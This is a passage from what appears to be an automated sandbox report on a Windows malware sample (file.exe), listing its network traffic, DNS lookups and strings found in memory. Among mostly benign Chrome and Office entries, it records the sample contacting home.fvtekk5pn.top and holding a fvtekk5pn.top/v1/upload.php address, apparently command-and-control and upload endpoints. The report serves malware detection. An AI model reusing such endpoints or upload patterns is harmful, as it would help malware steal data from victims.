Source: global traffic HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1
  Host: home.fvtekk5pn.top
  Accept: */*
Source: chrome.exe, 00000004.00000002.4180753767.00001D40006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4180753767.00001D40006F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.4180753767.00001D40006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4180753767.00001D40006F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.4180753767.00001D40006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4180753767.00001D40006F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.4180753767.00001D40006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4180753767.00001D40006F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.4179797184.00001D40004A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: home.fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: unknown HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1
  Host: play.google.com
  Connection: keep-alive
  Content-Length: 912
  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-platform: "Windows"
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  Content-Type: application/x-www-form-urlencoded;charset=UTF-8
  Accept: */*
  Origin: chrome-untrusted://new-tab-page
  X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: file.exe, 00000000.00000002.4163006440.000000000140E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: HTTP://fvtekk5pn.top/v1/upload.php
Source: file.exe, 00000000.00000003.1680186508.0000000007242000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.4159253473.00000000007E3000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://.css
Source: file.exe, 00000000.00000003.1680186508.0000000007242000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.4159253473.00000000007E3000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://.jpg
Source: chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4180596501.00001D40006A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000004.00000002.4179797184.00001D40004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4180596501.00001D40006A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7724
Source: chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4180596501.00001D40006A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7760
Source: chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4180596501.00001D40006A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7761
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8162
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8215
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 00000004.00000002.4180426023.00001D4000634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4180596501.00001D40006A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8280
Source: chrome.exe, 00000004.00000002.4178653959.00001D400020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000004.00000002.4180465586.00001D4000654000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: chrome.exe, 00000004.00000002.4178104290.00001D40000F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjhkYWYwZDctOTExOS00MGQ5LTgyNjAt
Source: chrome.exe, 00000004.00000002.4185007411.00001D4000ECC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_third_pa
Source: chrome.exe, 00000004.00000002.4182069887.00001D40009C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/V3P1l2hLvLw_7/7_all_sslErrorAssistant.crx3
Source: chrome.exe, 00000004.00000002.4182509155.00001D4000ABC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/ac6mhlwypzipnufijdvfyhdgvt4q_67/khaoiebndkojlmppeemjh
Source: chrome.exe, 00000004.00000002.4181939511.00001D4000984000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.0/jamhcnnkihi
Source: chrome.exe, 00000004.00000002.4182509155.00001D4000ABC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/acbk3qzfwhzj3ij3hxeo5shqbiyq_3051/jflookgnkcckhobagln
Source: chrome.exe, 00000004.00000002.4181939511.00001D4000984000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/acccxbt6wwsvpxzpob4hojndwkqq_4.10.2830.0/oimompecagna
Source: chrome.exe, 00000004.00000002.4182509155.00001D4000ABC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/acn4hv7x5kzrroi23ju5jxhlnohq_9329/hfnkpimlhhgieaddgfe
Source: chrome.exe, 00000004.00000002.4182509155.00001D4000ABC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/acy4uco6fk3ffech36mcvhbh7gyq_1138/efniojlnjndmcbiieeg
Source: chrome.exe, 00000004.00000002.4181939511.00001D4000984000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/ad3skwo2srs5xchyxzz6ujgnedha_9.52.0/gcmjkmgdlgnkkcocm
Source: chrome.exe, 00000004.00000002.4181939511.00001D4000984000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4178104290.00001D40000F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0/gonpemdgkjce
Source: chrome.exe, 00000004.00000002.4180465586.00001D4000654000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/eeigpng
Source: chrome.exe, 00000004.00000002.4181939511.00001D4000984000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.1305/cocncanleaf
Source: chrome.exe, 00000004.00000002.4178104290.00001D40000F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/cxxqn654fg7hzrcrrnqcniqqye_2024.10.11.1/kiabhabjdbkjd
Source: chrome.exe, 00000004.00000002.4181939511.00001D4000984000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/dvn6tjyuqqxdoyobslkdwn7pvi_2024.4.15.1148/ggkkehgbnfj
Source: chrome.exe, 00000004.00000002.4178406794.00001D400018C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/ehkm77qex4c7vp4fg5wiyewe6u_20241111.695153350.14/obed
Source: chrome.exe, 00000004.00000002.4182509155.00001D4000ABC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/glrp3iosgzhorafatuxaf2eate_476/lmelglejhemejginpboagd
Source: chrome.exe, 00000004.00000002.4178104290.00001D40000F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/neifaoindggfcji
Source: chrome.exe, 00000004.00000002.4182509155.00001D4000ABC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/j2hxfei2occ5siitujtlwgp6xi_3/ojhpjlocmbogdgmfpkhlaaea
Source: chrome.exe, 00000004.00000002.4182509155.00001D4000ABC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwy
Source: chrome.exe, 00000004.00000002.4178104290.00001D40000F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjhkYWYwZDctOTExOS00
Source: chrome.exe, 00000004.00000002.4177573063.00001D4000030000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_
Source: chrome.exe, 00000004.00000002.4183228075.00001D4000C1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/V3P1l2hLvLw_7/7_all_sslErrorAssistant.crx
Source: chrome.exe, 00000004.00000002.4178104290.00001D40000F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ac6mhlwypzipnufijdvfyhdgvt4q_67/khaoiebnd
Source: chrome.exe, 00000004.00000002.4180465586.00001D4000654000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.0
Source: chrome.exe, 00000004.00000002.4181939511.00001D4000984000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acbk3qzfwhzj3ij3hxeo5shqbiyq_3051/jflookg
Source: chrome.exe, 00000004.00000002.4180465586.00001D4000654000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acccxbt6wwsvpxzpob4hojndwkqq_4.10.2830.0/
Source: chrome.exe, 00000004.00000002.4178104290.00001D40000F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acn4hv7x5kzrroi23ju5jxhlnohq_9329/hfnkpim
Source: chrome.exe, 00000004.00000002.4178104290.00001D40000F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acy4uco6fk3ffech36mcvhbh7gyq_1138/efniojl
Source: chrome.exe, 00000004.00000002.4181939511.00001D4000984000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ad3skwo2srs5xchyxzz6ujgnedha_9.52.0/gcmjk
Source: chrome.exe, 00000004.00000002.4180465586.00001D4000654000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0/
Source: chrome.exe, 00000004.00000002.4180465586.00001D4000654000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.23
Source: chrome.exe, 00000004.00000002.4178240394.00001D400014C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ehkm77qex4c7vp4fg5wiyewe6u_20241111.69515
Source: chrome.exe, 00000004.00000002.4178104290.00001D40000F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/glrp3iosgzhorafatuxaf2eate_476/lmelglejhe
Source: chrome.exe, 00000004.00000002.4182509155.00001D4000ABC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/j2hxfei2occ5siitujtlwgp6xi_3/ojhpjlocmbog
Source: chrome.exe, 00000004.00000002.4177827136.00001D400008E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://google.com/
Source: file.exe, 00000000.00000002.4159253473.00000000007E3000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW17
Source: file.exe, file.exe, 00000000.00000003.2197316136.000000000143D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197432722.0000000001442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4159253473.00000000007E3000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347
Source: file.exe, 00000000.00000003.2197316136.000000000143D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197432722.0000000001442000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347)
Source: file.exe, 00000000.00000002.4159253473.00000000007E3000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347libgcc_s_dw2-1.dll__register_frame_info__der
Source: file.exe, 00000000.00000003.2197316136.000000000143D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197432722.0000000001442000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347lse
Source: file.exe, 00000000.00000003.1680186508.0000000007242000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.4159253473.00000000007E3000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://html4/loose.dtd
Source: chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://issuetracker.google.com/200067929
Source: chrome.exe, 00000004.00000003.2387816686.00001D4001020000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2388021721.00001D400104C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2387889973.00001D4001030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2387953551.00001D4000F80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jsbin.com/temexa/4.
Source: chrome.exe, 00000004.00000003.2387816686.00001D4001020000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2391437793.00001D4001168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2390892457.00001D4000A14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2391233881.00001D400040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2390918320.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2388021721.00001D400104C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4179079309.00001D40002F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2387889973.00001D4001030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2387953551.00001D4000F80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2391437793.00001D4001110000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2390867305.00001D4000CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2390957433.00001D4000FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2387927154.00001D4001080000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 00000004.00000003.2387816686.00001D4001020000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2391437793.00001D4001168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2390892457.00001D4000A14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2391233881.00001D400040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2390918320.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2388021721.00001D400104C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4179079309.00001D40002F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2387889973.00001D4001030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2387953551.00001D4000F80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2391437793.00001D4001110000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 